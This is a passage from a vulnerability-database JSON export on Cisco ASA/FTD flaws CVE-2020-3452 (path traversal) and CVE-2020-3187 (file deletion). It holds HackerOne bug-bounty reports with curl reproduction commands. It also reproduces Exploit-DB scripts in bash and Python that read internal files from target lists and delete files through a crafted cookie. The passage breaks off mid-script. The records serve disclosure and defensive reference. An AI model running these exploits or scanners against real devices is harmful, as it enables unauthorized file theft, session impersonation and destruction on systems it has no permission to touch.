A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-16T00:50:48", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:47:46", "id": "H1:959679", "href": "https://hackerone.com/reports/959679", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:26", "bounty": 0.0, "description": "**Summary:**\nI discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n## Impact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. 
The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## Step-by-step Reproduction Instructions\n- In a web browser, navigate to https://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n- Once URL is fully loaded, you will be prompted to download file `translation-table` that represents `portal_inc.lua` which you can then open and observe its content.\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n- Alternatively, you can execute the below linux bash terminal command to download that same file `portal_inc.lua`: \n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" --output portal_inc.lua \n```\n\n- You can download various internal files using curl flag `--output` to output the binary data to a file:\n \n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js \n```\n\n## Product, Version, and Configuration (If applicable)\nWebApp endpoint\n\n## Suggested Mitigation/Remediation Actions\n- Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n- This advisory is available at the following link https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. 
A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-16T23:32:49", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Read-only path traversal (CVE-2020-3452) at https://\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-04-02T18:46:36", "id": "H1:960082", "href": "https://hackerone.com/reports/960082", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:15", "bounty": 0.0, "description": "**Summary:**\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n**Description:**\nGet request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.\n\nAccording to Cisco:\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.\n\n## Step-by-step Reproduction Instructions\n## In Browser:\n1. Copy and paste into your browser: \u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"\n2. Note the file being requested to be download. 
This will be the source code for portal_inc.lua which is not normally accessible. \n\n##In curl:\n1. curl -k \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.\n2. Various internal files can be read, and some require using the --output command to output the data to a file as shown in step 3.\n3. curl -k \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/http_auth.html&default-language&lang=../\" --output session.js\n\n## Product, Version, and Configuration (If applicable)\nAnyConnect SSL VPN -webvpn\nClientless SSL VPN - webvpn\n\n## Suggested Mitigation/Remediation Actions\nUpdate the software to the latest version via the Cisco advisory linked above in the Summary.\n\n## Impact\n\nAn attacker can view arbitrary files within the web services file system on the targeted device that are meant to be internal or confidential. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. \nCVSS Score: Base 7.5\nVector: https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-15T02:08:55", "type": "hackerone", "title": "U.S. 
Dept Of Defense: \u2588\u2588\u2588 is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-09-03T17:24:29", "id": "H1:959187", "href": "https://hackerone.com/reports/959187", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:06", "bounty": 150.0, "description": "CVE-2020-3452 on webvpn.city-srv.ru", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-11-01T10:57:59", "type": "hackerone", "title": "Mail.ru: CVE-2020-3187 on IP address 91.231.115.30", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2021-05-06T12:42:27", "id": "H1:1023792", "href": "https://hackerone.com/reports/1023792", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T03:23:14", "bounty": 500.0, "description": "Steps to reproduce:\n I could delete arbitrary files from https://79.142.21.220/ using CVE-2020-3187.\n\nPOC video is attached.\n\nBrowser/OS: Chrome/Windows\n\nALSO Cisco ASA - Arbitrary File Read - CVE-2020-3452\n\nthe file downloaded also attached here for poc\n\n## Impact\n\nImpact: RCE is P1 critical vulnerability, which can be used to make any server non-functional causing millions of dollars loss.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-28T07:06:17", "type": "hackerone", "title": "QIWI: CVE-2020-3187 - unauthenticated arbitrary file deletion in Cisco", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3452"], "modified": "2021-09-24T20:37:41", "id": "H1:944665", "href": "https://hackerone.com/reports/944665", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:06:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-12T00:00:00", "type": "exploitdb", "title": "Cisco ASA and FTD 9.6.4.42 - Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-10-12T00:00:00", "id": "EDB-ID:48871", "href": "https://www.exploit-db.com/exploits/48871", "sourceData": "# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal\r\n# Date: 2020-10-10\r\n# Exploit Author: 3ndG4me\r\n# Vendor: www.cisco.com\r\n# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html\r\n# CVE : CVE-2020-3452\r\n\r\n\r\n\r\nTARGET=$1\r\nCISCO_KNOWN_FILES=\"logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home 
logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen\"\r\nmkdir cisco_asa_files\r\n\r\nif [ -z \"$1\" ];\r\nthen\r\n echo \"Usage: cve-2020-3452.sh <target ip/hostname>\"\r\n echo \"Example: cve-2020-3452.sh mytarget.com\"\r\n echo \"Files that are downloaded will be in the newly created 'cisco_asa_files' directory\"\r\n echo \"Target not specificed...exiting...\"\r\nelse\r\n for FILE in $CISCO_KNOWN_FILES;\r\n do\r\n curl \"https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../\" | tee cisco_asa_files/$FILE;\r\n done\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48871", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T02:09:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-28T00:00:00", "type": "exploitdb", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-07-28T00:00:00", "id": "EDB-ID:48722", "href": "https://www.exploit-db.com/exploits/48722", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? 
) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to 
CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi", "sourceHref": "https://www.exploit-db.com/download/48722", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T06:05:53", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-15T00:00:00", "type": "exploitdb", "title": "Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3452", "CVE-2020-3452"], "modified": "2020-12-15T00:00:00", "id": "EDB-ID:49262", "href": "https://www.exploit-db.com/exploits/49262", "sourceData": "# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)\r\n# Date: 12 Dec 2020\r\n# Exploit Author: Freakyclown@cygenta.co.uk\r\n# Vendor Homepage: cisco.com\r\n# Software Link: It\u2019s against Hardware, specifically ASA\u2019s and FTD\u2019s\r\n# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD\u2019s (versions 6.2.3 to 6.6.0.1)\r\n# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14\r\n# CVE : CVE-2020-3452\r\n# Github 
: https://github.com/cygenta/CVE-2020-3452\r\n\r\nimport requests\r\n\r\n# Written by freakyclown for @CygentaHQ\r\n# Cisco ASA Path Traversal\r\n# CVE-2020-3452\r\n# Usage: CVE-2020-3452.py {target}\"\r\n# Example: CVE-2020-3452.py 192.168.0.12\"\r\n# Requires - Requests - pip3 install requests\r\n#\r\n# This tool takes advantage of the above cve and attempts to\r\n# download files as listed below, it is suggested that you make\r\n# a working folder for the outputfiles to avoid confusion if\r\n# attacking mutliple ASA's\r\n\r\n# set your target\r\ntarget = input(\"Enter target IP/Url: \")\r\n\r\n\r\ndef grabstuff():\r\n for file in files:\r\n print(\"trying: \", file)\r\n\r\n #set request parameters\r\n params = (\r\n ('type', 'mst'),\r\n ('textdomain', '+CSCOE+/'+file),\r\n ('default-language', ''),\r\n ('lang', '../'),\r\n )\r\n\r\n # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems\r\n response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)\r\n # write the file to the disk\r\n f = open(file,\"w\")\r\n f.write(response.text) \r\n f.close()\r\n\r\n\r\n\r\n# this is a list of files available to download, more will be added in time\r\n# if anyone has a list of ASA files, I'd be happy to add here\r\nfiles = 
{\r\n\"sess_update.html\",\r\n\"blank.html\",\r\n\"noportal.html\",\r\n\"portal_ce.html\",\r\n\"portal.html\",\r\n\"logon_custom.css\",\r\n\"svc.html\",\r\n\"logo.gif\",\r\n\"portal_inc.lua\",\r\n\"nostcaccess.html\",\r\n\"session.js\",\r\n\"portal.js\",\r\n\"portal_custom.css\",\r\n\"running.conf\",\r\n\"tlbrportal_forms.js\",\r\n\"logon_forms.js\",\r\n\"win.js\",\r\n\"portal.css\",\r\n\"lced.html\",\r\n\"pluginlib.js\",\r\n\"useralert.html\",\r\n\"ping.html\",\r\n\"app_index.html\",\r\n\"shshimdo_url\",\r\n\"session_password.html\",\r\n\"relayjar.html\",\r\n\"relayocx.html\",\r\n\"color_picker.js\",\r\n\"color_picker.html\",\r\n\"cedhelp.html\",\r\n\"cedmain.html\",\r\n\"cedlogon.html\",\r\n\"cedportal.html\",\r\n\"portal_elements.html\",\r\n\"commonspawn.js\",\r\n\"common.js\",\r\n\"appstart.js\",\r\n\"relaymonjar.html\",\r\n\"relaymonocx.html\",\r\n\"cedsave.html\",\r\n\"tunnel_linux.jnlp\",\r\n\"ask.html\",\r\n\"no_svc.html\",\r\n\"preview.html\",\r\n\"cedf.html\",\r\n\"ced.html\",\r\n\"logon_redirect.html\",\r\n\"logout.html\",\r\n\"tunnel_mac.jnlp\",\r\n\"gp-gip.html\",\r\n\"auth.html\",\r\n\"wrong_url.html\",\r\n\"logon.html\"}\r\n\r\n\r\n# obvious thing is obvious, try the things and barf if fail\r\ntry:\r\n grabstuff()\r\nexcept Exception as err:\r\n print(\"Something went wrong sorry\")\r\n print(err)", "sourceHref": "https://www.exploit-db.com/download/49262", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T04:09:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-29T00:00:00", "type": "exploitdb", 
"title": "Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-3187", "CVE-2020-3187", "CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "EDB-ID:48723", "href": "https://www.exploit-db.com/exploits/48723", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file deletion\r\n# Version: Cisco ASA Software releases 9.5 and earlier, as well as\r\n# Release 9.7, have reached end of software maintenance. 
Customers are\r\n# advised to migrate to a supported release that includes the fix for\r\n# this vulnerability.\r\n# CVE : CVE-2020-3187\r\n\r\n#!/bin/bash\r\n\r\ndelete=\"csco_logo.gif\"\r\n\r\n\r\nhelpFunction()\r\n{\r\necho \"\"\r\necho -e \"\\t\\tCVE-2020-3187\"\r\necho \"\"\r\necho \"Usage: $0 -l targets.txt -d csco_logo.gif \"\r\necho -e \"\\t-l for list of IPs in text file\"\r\necho -e \"\\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif\"\r\necho -e \"\\t-i for single IP test\"\r\nexit 1\r\n}\r\n\r\nwhile getopts \"l:d:i:\" opt\r\ndo\r\ncase \"$opt\" in\r\nl ) input=\"$OPTARG\" ;;\r\nd ) delete=\"$OPTARG\" ;;\r\ni ) website=\"$OPTARG\" ;;\r\n? ) helpFunction ;;\r\nesac\r\ndone\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\necho \"Some/all of the parameters are empty\";\r\nhelpFunction\r\nfi\r\n\r\n#usage\r\n\r\nif [ -z \"$input\"];\r\nthen\r\nstatus=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\necho \"checking if $website has the $delete file\"\r\nif [ $status -eq 200 ]; then\r\necho \"$website/+CSCOU+/$delete exists, deleting it...\"\r\ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o\r\nresultsindv.txt $website/+CSCOE+/session_password.html\r\ndelcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w\r\n'%{http_code}\\n' -s)\r\nif [ delcheck -eq 